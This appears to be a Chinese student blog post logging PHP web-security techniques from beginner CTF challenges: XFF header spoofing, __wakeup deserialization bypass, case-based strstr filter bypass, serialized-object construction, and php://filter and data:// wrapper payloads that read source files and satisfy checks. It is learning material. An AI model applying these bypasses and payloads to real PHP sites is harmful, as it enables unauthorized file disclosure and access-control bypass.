Web学习日志(一)

已于 2024-04-15 23:46:46 修改
阅读量834 收藏 10
点赞数 23
文章标签: web php
于 2024-04-15 23:44:48 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_74312676/article/details/137185109
版权

目录

1、HTTP头注入

2、wake up函数绕过

3、strstr函数的绕过

4、析构函数和构造函数

5、json_encode与json_decode

json_encode:

json_decode:

6、php伪协议

php://filter读取文件

file_get_contents()函数

data://协议

1、HTTP头注入

User-Agent:使服务器能够识别用户的操作系统,浏览器版本等

Cookie:网站为了辨别用户身份进行session跟踪

X-Forwarded-For:简称XFF头,代表HTTP端真实的ip(修改XFF头可以实现IP伪造)

Rerferer:浏览器向web服务器表明自己的页面来源

Host:指定用户自己想访问的web服务器的域名,IP,端口

例题:nssctf:[SWPUCTF 2021 新生赛]Do_you_know_http

2、wake up函数绕过

_wakeup魔术方法在执行反序列化时,会被优先调用,而不会调用_construct方法

绕过方法:序列化字符串中表示对象属性个数的值大于真实属性的个数时,就会跳过_wakeup的执行

比如·:

O:6:"people":3:{s:4:"name";s:6:"张三";s:3:"age";s:2:"18"}

people 后面的值 3 大于真实属性个数 2,在反序列化时不执行 __wakeup。并且此时,反序列化会立刻强制触发 __destruct() 。

例题:nssctf:[SWPUCTF 2021 新生赛]no_wakeup

3、strstr函数的绕过

strstr函数匹配时要区分大小写,所以可以用大小写绕过

如:strstr($page, "php://")

PHP就不会被过滤掉

4、析构函数和构造函数

__construct()构造函数,它是在实例化一个对象(即new时)会自动调用

__destruct是析构函数,会在对象的所有引用被删除或者当对象被显式销毁时自动执行,比如new完一个对象,当创建完成之后就不引用了,如果有赋值指向就会立马丢弃,触发destruct函数。

例题:nssctf:NSSCTF | 在线CTF平台

<?php
class wllm{
    public $admin;
    public $passwd;
    public function __construct(){
        $this->admin ="user";
        $this->passwd = "123456";
    }
 
        public function __destruct(){
        if($this->admin === "admin" && $this->passwd === "ctf"){
            include("flag.php");
            echo $flag;
        }else{
            echo $this->admin;
            echo $this->passwd;
            echo "Just a bit more!";
        }
    }
}

构造:

$w=new wllm();
$w->admin="admin";
$w->passwd="ctf";
$w=serialize($w);
echo $w;

5、json_encode与json_decode

json_encode:

        主要用来将数组和对象转化为json格式。

(1)将数组转化为json格式:

        代码:

$arr = array ('a'=>1,'b'=>2,'c'=>3,'d'=>4,'e'=>5);
  
echo json_encode($arr);

输出如下:

{"a":1,"b":2,"c":3,"d":4,"e":5}

(2)将对象转化为json格式:

代码:

$test->site = 'ido321.com';
  
$test->id = 22;
  
$test->name = 'dwqs';
  
echo json_encode($test);

输出如下:

{
    "site":"ido321.com",
  
    "id":22,
  
    "name":"dwqs",
  }

json_decode:

        将json格式转化为数组的格式

代码:

$arr = Array('one', 'two', 'three');
  
echo json_encode($arr);

结果:

["one","two","three"]

例题:NSSCTF | 在线CTF平台

判断条件是if ($id=="wllmNB"&&$json['x']=="wllm")

我们只需使json['x']的值为wllm,id=wllmNB即可,编写php脚本:

<?php
$arr = array('x'=>'wllm');
$json = json_encode($arr);
echo($json)

?>

输出结果:

{"x":"wllm"}

拿到flag

6、php伪协议

练习例题:NSSCTF | 在线CTF平台

php://filter读取文件

打开可以看到url栏中有个参数wllm,我们要访问hint.php文件,于是可以考虑用php伪协议来读取该文件

构造payload:

wllm=php://filter/read/convert.base64-encode/resource=hint.php

 就可以看到多了一串base编码

解码得:

<?php

//go to /test2222222222222.php

?>

访问该文件,即可看到php代码:

 <?php
ini_set("max_execution_time", "180");
show_source(__FILE__);
include('flag.php');
$a= $_GET["a"];
if(isset($a)&&(file_get_contents($a,'r')) === 'I want flag'){
    echo "success\n";
    echo $flag;
}
?>

file_get_contents()函数

该函数用于读取文件

(file_get_contents($a,'r') === 'I want flag'表示以只读的形式打开文件a,并且判断a的内容是否等于“I want flag”,可知我们只要以get的方式将“I want flag”传入a中,就可拿到flag

data://协议

和php;//filter类似,构造payload:

?a=data://text/plain,I want flag

拿到flag

一路向北_.
关注
  • 23
    点赞
  • 10
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
基于机器学习web入侵检测
学-> 思->用
05-07 1612
建立机器学习算法 数据集 数据集使用2021年5月到2021年7月的log数据为训练.2021年8月到2021年10月为预测数据 数据集处理 web攻击属于机器学习的分类问题,分类问题有可以分为监督学习和无监督学习.本文使用监督学习,也就是说样本需要提前标注.1表示web受到攻击,0表示web正常. 特征提取 以下特征被用作分析,这些特征都是从log日志中提取出来的 HTTP return code URL length Number of parameters in the query 提取日志
analog:一款基于机器学习Web日志统计分析与异常检测命令行工具
05-01
一款基于机器学习Web日志统计分析与异常检测命令行工具 · · analog 是一款命令行下的Web日志审计工具,旨在帮助使用者能够在终端上快速得进行Web日志审计和排查,包含了日志审计、统计的终端图形化和机器学习...
基于机器学习Web日志异常检测实践
Rnan_prince的博客
09-21 1419
https://cloud.tencent.com/developer/article/1376126
web攻击日志分析之入门指南
swordheart的博客
04-19 6785
0x00 前言 现实中可能会经常出现web日志当中出现一些被攻击的迹象,比如针对你的一个站点的URL进行SQL注入测试等等,这时候需要你从日志当中分析到底是个什么情况,如果非常严重的话,可能需要调查取证谁来做的这个事情,攻击流程是什么样子的。 除此之外,还有其他场景。 作为一名管理员,理解如何从安全的角度来分析日志真的很重要。 这篇文章内容包括了日志分析的一些基础知识,可以解决上述需求。 0x01 准备 出于演示目的,我进行以下设置。 Apache 服务器 预安装在Kali Linux 可
Web日志安全分析系统实践
lixiaoxiong的专栏
03-13 7543
本文转自:https://xianzhi.aliyun.com/forum/topic/2136?from=timeline&amp;isappinstalled=0零、前言在社区看到了这篇日志分析的文章--《Web日志安全分析浅谈》,文章整体写的非常棒,对日志分析的作用、难点、工程化建设和攻击溯源等方面进行了全面的描述。去年的毕设我也做了相关的研究,主要是去实现一个日志分析系统,算是一个更加的完...
Hadoop学习之Flume日志采集
weixin_46490924的博客
02-18 3324
Hadoop学习之Flume日志采集
Web日志安全分析浅谈
Fly_鹏程万里
10-18 5424
一、为什么需要对日志进行分析? 随着Web技术不断发展,Web被应用得越来越广泛,所谓有价值的地方就有江湖,网站被恶意黑客攻击的频率和网站的价值一般成正比趋势,即使网站价值相对较小,也会面对“脚本小子”的恶意测试攻击或者躺枪于各种大范围漏洞扫描器,正如安全行业的一句话:“世界上只有两种人,一种是知道自己被黑了的,另外一种是被黑了还不知道的” 此时对网站的日志分析就显得特别重要,作为网站管理...
Web 性能实践日志 学习
kylin@world
12-01 975
web 性能实践日志 学习
Web 日志分析过程
王道长的技术博客
05-09 2488
文章目录Web 日志分析过程一、日志格式学习二、入侵日志分析2.1 网站被入侵,分析解决思路:2.1.1 下载日志分析 access.log+error.log2.1.2 找到攻击者的 IP 地址2.1.3 攻击者是如何找到网站后台的?2.1.4 攻击者如何进入后台?2.1.5 攻击者修改了什么文件来写一句话?2.1.6攻击者通过一句话后门做了什么?三、通过 SQL 注入日志分析3.1 sql 入...
Web学习-apache查看log日志
累了就歇一会
10-12 1万+
查看apache日志 apache日志位置 不同的系统位置不同。 widnows 假如是windows的话,xampp下应该是都存在的,直接去找apache的folder/log/access.log | error.log下的文件就好了 Ubuntu和Mac 这个是要找apache的位置的,可以尝试用whereis apache2来查看ubuntu
基于深度学习日志数据异常检测
热门推荐
王清欢的博客
12-27 2万+
基于日志数据的异常检测 数据对象 智能运维(AIOps)是通过机器学习等算法分析来自于多种运维工具和设备的大规模数据。智能运维的分析数据对象多源运维数据包括系统运行时数据和历史记录数据,历史记录数据主要包含表单和系统更新文档等。与历史记录数据相比,系统运行时数据能够反映系统的动态特征及系统发生故障时的上下文信息,对未知故障具有更好的探测和表达能力。 系统运行时数据主要包含监控数据和日志数据,监控数据记录的是指系统运行状态下的资源占用情况,如中央处理器使用率、内存使用率、网络流量、进程数目以及进程资源使
基于机器学习Web日志统计分析与异常检测工具python源码+项目说明.zip
01-06
基于机器学习Web日志统计分析与异常检测工具python源码+项目说明.zip 【资源功能介绍】 命令行下的Web日志审计工具,旨在帮助使用者能够在终端上快速得进行Web日志审计和排查,包含了日志审计、统计的终端图形化和...
基于机器学习Web日志统计分析与异常检测命令行工具
05-27
【项目介绍】:analog 是一款命令行下的Web日志审计工具,旨在帮助使用者能够在终端上快速得进行Web日志审计和排查,包含了日志审计、统计的终端图形化和机器学习识别恶意请求的功能。 访问量统计 analog> show ...
一款基于机器学习Web日志统计分析与异常检测命令行工具.zip
02-15
人工智能-机器学习
周期Day2-基于机器学习Web日志的分析识别1
08-03
在本项目"周期Day2-基于机器学习Web日志的分析识别1"中,我们将深入探讨如何利用机器学习技术来分析和识别Web日志中的潜在攻击。该项目分为四个主要部分:了解基础知识、日志预处理及攻击分类、机器学习模型搭建...
深入解析PHP函数
NatLindsay的博客
06-17 288
PHP函数是一种重要的编程概念,它可以帮助开发者组织和管理代码,提高代码的可重用性和可维护性。在PHP中,函数可以完成各种任务,从简单的数学计算到复杂的数据库查询和数据处理。本文将从多个角度探讨PHP函数的应用,涵盖了函数的定义和调用、内置函数的使用、自定义函数的创建以及常见的函数库。函数的参数:函数可以接受零个或多个参数,用于传递数据给函数内部使用。函数可以带有参数,用于接收输入,也可以返回值。函数命名:选择一个有意义的函数名,以便描述函数的功能。函数体:编写函数的具体实现代码,实现特定的功能。
k8s解决java服务下载超时问题
最新发布
云深海阔专栏
06-18 74
我们在走ingress的java程序的时候,往往会有导出数据的功能,这个时候就会有因网络慢、后台处理时间过长导致下载超时,也有因下载文件太大,导致下载失败,综合解决办法如下。1)更改反向代理超时时间。
1. NAS和SAN存储
u010198709的博客
06-13 496
流程:存储端共享裸块设备,客户端连接存储映射出sdx的虚拟硬盘,客户端分区格式化挂载使用。IQN名称格式: iqn.yyyy-mm.反域名:自定义名称。用户名:openfiler, 密码:password。磁盘接口:SATA,SAS、NVME。支持nfs、cifs协议共享存储空间。nfs:适用于Linux、Unix。类型:IP SAN、FC SAN。cifs:适用于Windows。磁盘类型:机械硬盘、SSD。基于文件系统级别的共享。DAS 直接附加存储。NAS 网络附加存储。SAN 存储区域网络。
PHP异常处理的最佳实践及常见问题解决
NatLindsay的博客
06-11 325
异常处理的基本原理是,当try块中的代码发生异常时,PHP会寻找匹配的catch块进行处理,如果没有找到对应的catch块,则异常会向上传递直至被处理为止。PHP异常处理是在开发过程中至关重要的一环,它能够帮助开发人员捕获和处理程序运行过程中的错误和异常情况,提高代码的稳定性和可靠性。在实际开发中,可能会遇到各种各样的异常处理问题,比如异常未被捕获、异常信息不清晰、异常处理性能问题等。合理地使用自定义异常类能够使异常处理更加灵活和规范化,有助于统一异常信息和错误码,提高代码的可维护性和可读性。
网络安全web方向学习路线
05-07
学习网络安全Web方向需要掌握的知识点比较多,以下是一个基础的学习路线: 1. 掌握Web开发基础知识,例如HTML、CSS、JavaScript、HTTP协议等; 2. 熟悉常见Web漏洞,如SQL注入、XSS跨站脚本攻击、CSRF跨站请求伪造...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值